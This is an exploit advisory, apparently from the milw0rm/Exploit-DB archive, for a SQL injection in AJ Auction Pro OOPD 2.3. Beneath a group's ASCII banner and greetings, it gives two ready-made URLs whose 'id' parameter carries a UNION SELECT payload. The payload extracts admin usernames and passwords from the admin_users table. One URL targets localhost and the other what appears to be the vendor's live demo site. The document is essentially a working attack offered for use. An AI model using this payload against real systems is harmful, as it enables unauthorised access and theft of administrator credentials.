[] NeoSense

AJ Auction Pro OOPD 2.3 - 'id' SQL Injection

Author: snakespc
type: webapps
platform: php
port: 
date_added: 2009-01-19 
date_updated: 2016-11-28 
verified: 1 
codes: OSVDB-51496 
tags: 
aliases:  
screenshot_url:  
application_url: 

==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            =
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            =
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	         AJAuctionPro OOPD v2.3 SQL Injection Vulnerability                                      +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =
                =                                                                                    =
                =                   :::::Mail: snakespc@gmail.com:::::::                             =
                =                                                                                    =                                                                                   =
                =            http://www.ajsquare.com/products/auction/demo.php  "index.php"          =
                =====================================GAZA=============================================

Exploit:
http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
********
demo:
http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/sc >>>> Members
Str0ke ....Milw0rm
==================================================================GAZA============================================================

# milw0rm.com [2009-01-20]